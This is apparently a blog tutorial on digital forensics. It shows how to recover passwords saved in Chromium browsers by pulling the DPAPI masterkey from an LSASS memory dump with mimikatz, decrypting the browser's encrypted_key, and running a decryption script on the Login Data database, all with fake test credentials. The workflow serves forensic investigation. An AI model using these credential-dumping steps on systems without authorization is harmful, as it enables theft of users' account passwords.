Forensic Recovery of Chrome Based Browser Passwords

Recently John Hammond have release this excellent video [1] showing how threat actors leverage tools to harvest credentials stored in Chrome browser. I recommend checking his video and youtube channel for other cyber security topics. During an investigation, the credentials stored in Chrome based browsers (Chrome, Edge, Brave, etc) may be a critical piece of information to support and/or solve the case under analysis. Few tools are able to parse that information and extract such a relevant data to forensic investigator. Inspired by John’s video and the tool created by Jayden Oh Yicong [2], I challenged myself to adapt the python script, and in conjunction with other tools, be able to decrypt sensitive data stored into chromium browsers.

Disclaimer

All the information shared here are should be used carefully. Please be advised that you should not use this tool or knowledge without the proper authorization. Use at your own risk.

Requirements

In order to successfully proceed with the passwords decryption, you will need to have the following evidence previously preserved during your acquisition phase of the forensic process:

• Memory dump of the machine
• Files Local State and Default\Login Data collected from \User Data\ chromium path. See some references:
• Edge: C:\Users\user\AppData\Local\Microsoft\Edge\User Data
• Chrome: C:\Users\user\AppData\Local\Google\Chrome\User Data
• Brave: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\

Scenario

Imagine that during a digital forensic investigation you have acquired the mentioned data, you’re lucky. I have created a test environment using Microsoft Edge and saved this fake credential into the browser settings. The credential is encrypted using AES algorithm and the key is encrypted with windows data protection API (DPAPI). That’s the reason when I click the ‘eye’ icon to show the password, Edge will ask for my credentials before displaying my saved password.

Microsoft Edge — Saved Passwords

Process

As previously mentioned, the password is encrypted with a key stored into json Local State file. In older chrome browser versions, this was the key used to decrypt the passwords in local SQLite database Login Data file. The newer chrome versions improved the security and now this key is encrypted with DPAPI, using user’s masterkey to create a new layer of security. This is how you will see the password stored in `Login Data` database file, table logins:

Login Data — Encrypted Saved Passwords

Since we were prepared for this case, we were able to collect the required files, including the memory dump. We can now mount our memory file with MemProcFS [3] and extract the minidump from lsass process.

C:\Cases>c:\Binaries\MemProcFS\MemProcFS.exe -device Evidence\MEM.dmp
Initialized 64-bit Windows 10.0.19041
[PLUGIN] Python initialization failed. Python 3.6 or later not found.
============================== MemProcFS ==============================
 - Author: Ulf Frisk - pcileech@frizk.net
 - Info: https://github.com/ufrisk/MemProcFS
 - License: GNU Affero General Public License v3.0
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 MemProcFS is free open source software. If you find it useful please
 become a sponsor at: https://github.com/sponsors/ufrisk Thank You :)
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 - Version: 5.7.0 (Windows)
 - Mount Point: M:\
 - Tag: 19041_ac62bdf1
 - Operating System: Windows 10.0.19041 (X64)
==========================================================================

The memory will be mounted as a network share, drive letter `M:`. Navigate to M:\name\lsass-PID.exe\minidump dir. Into this path, you should see a file named minidump.dmp. This is the memory dump of lsass process. I’ll not go into details here, but LSASS (Local Security Authority Subsystem Service) is the process responsible for authentication, auditing and policy enforcement in Windows OS. This gives us a hint why this process memory is so important to our analysis. Let’s continue.

lsass.exe — Minidump

M:\name\lsass.exe-652\minidump>dir
 Volume in drive M is DOKAN
 Volume Serial Number is 1983–1116
Directory of M:\name\lsass.exe-652\minidump
07/08/2023 12:10 PM 390 readme.txt
07/08/2023 12:11 PM 49,352,704 minidump.dmp
07/08/2023 12:12 PM <DIR> ..
07/08/2023 12:12 PM <DIR> .
 2 File(s) 49,353,094 bytes
 2 Dir(s) 536,870,912 bytes free

Once copied the file, we will open the minidump.dmp with mimikatz [4] and export the masterkey for the user being investigated. Save the MasterKey value. This is the first part of the secret we need to provide to our tool to decrypt the chrome encryption key. We will use this information in the future, as you will see.

mimikatz # sekurlsa::minidump C:\Cases\Exports\minidump.dmp
Switch to MINIDUMP : 'C:\Cases\Exports\minidump.dmp'
mimikatz # sekurlsa::dpapi
Authentication Id : 0 ; 803867 (00000000:000c441b)
Session : Interactive from 1
User Name : jdoe
Domain : DESKTOP
Logon Server : DESKTOP
Logon Time : 7/8/2023 12:46:44 PM
SID : S-1–5–21–1446339068–3897733333–3874546977–1001
 [00000000]
 * GUID : {35df93df-4eea-430a-89b7-a329d854bfb6}
 * Time : 7/8/2023 12:49:33 PM
 * MasterKey : 4da03d*****************************************01a3a51
 * sha1(key) : 766**********************04c

Now, open local state file from your chromium browser. In this example, since I’m using Microsoft Edge, the path will be C:\Users\jdoe\AppData\Local\Microsoft\Edge\User Data\Local State. Search (Ctrl+F) for “encrypted” and copy the encrypted_key value. This value is encoded with base64. Decode the information using your preferred tool (I’m using Cyberchef). Save the output to the disk in binary format (enckey.dat).

Microsoft Edge — Local State

Base64 decode of encrypted_key

Open and edit the saved file (enckey.dat) with your favorite hex editor and remove the DPAPI string in the beginning of the file. Save it. This is how it should look:

Before

enckey.dat — With DPAPI string

After

enckey.dat — After removing DPAPI string

After saving the modified binary key, we have our encrypted key that will be used to decrypt the saved chrome passwords, but we have one more problem here. This key is encrypted with user’s DPAPI masterkey. To proceed with decryption process, go back to mimikatz and this time use the dpapi module to decrypt the encrypted blob:

mimikatz # dpapi::blob /in:"C:\Cases\Exports\enckey.dat" /unprotect /masterkey:4da03d**************************01a3a51
**BLOB**
 dwVersion : 00000001–1
 guidProvider : {df9d8cd0–1501–11d1–8c7a-00c04fc297eb}
 dwMasterKeyVersion : 00000001–1
 guidMasterKey : {35df93df-4eea-430a-89b7-a329d854bfb6}
 dwFlags : 00000010–16 (audit ; )
 dwDescriptionLen : 0000001e - 30
 szDescription : Microsoft Edge
 algCrypt : 00006610–26128 (CALG_AES_256)
 dwAlgCryptLen : 00000100–256
 dwSaltLen : 00000020–32
 pbSalt : a3f63******************************************1f49503
 dwHmacKeyLen : 00000000–0
 pbHmackKey :
 algHash : 0000800e - 32782 (CALG_SHA_512)
 dwAlgHashLen : 00000200–512
 dwHmac2KeyLen : 00000020–32
 pbHmack2Key : c903***************************************************************50cf5
 dwDataLen : 00000030–48
 pbData : 9a30d***************************************************************************f195bd51
 dwSignLen : 00000040–64
 pbSign : b942c*******************************************************************************32edb
* using CryptUnprotectData API
 * masterkey : 4da03d***********************************01a3a51
description : Microsoft Edge
data: d9 11 1e e3 5b 80 5b 52 c3 6d a2 5b 53 da 42 a6 10 73 d2 c4 ad 59 2a 29 5b ba 7c 9f 58 16 4a 20

Now we have the key used to encrypt the password in Login Data database.

• Key: d9111ee35b805b52c36da25b53da42a61073d2c4ad592a295bba7c9f58164a20

Decrypt the Passwords

We’re almost there, just keep with me. Using all the information we collected during the previous steps, going through decryption process of our key, we can now use the script I tweaked to decrypt the passwords stored in our browser [7]. Run the python script with the key you collected:

$ python3 dcp.py -S 'd9111ee35b805b52c36da25b53da42a61073d2c4ad592a295bba7c9f58164a20' -P './Default/Login Data'
Sequence: 0
URL: https://gmail.com/
User Name: myusername@gmail.com
Password: MySecretPassword_918!!!
**************************************************

Bingo, here is our password:

• MySecretPassword_918!!!

Summary

Again, one more interesting scenario where a digital forensic investigator can use different techniques to extract critical information that may be extremely relevant to the case under analysis. Of course there are other methods one could use to acquire the same information, including collecting the masterkey from disk [5], but this will only works if we have access to user’s password. The other option would be to upload the script [2], execute it and collect the resulting CSV file. In in some cases you might just being presented with the evidences and have no other option to go back to the scenario and execute other tools. I hope this article can help digital forensic community to recover important information that can be relevant to a case.

Final words, when you don’t have the tool you need to do the job, just remember Bear Grylls:

References

[1] https://www.youtube.com/watch?v=CIOsemj3kl4

[2] https://github.com/ohyicong/decrypt-chrome-passwords

[3] https://github.com/ufrisk/MemProcFS

[4] https://github.com/gentilkiwi/mimikatz/

[5] https://nandynarwhals.org/sieberrsec-ctf-3.0-digginginthedump/

[6] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

[7] https://github.com/palmenas/dcp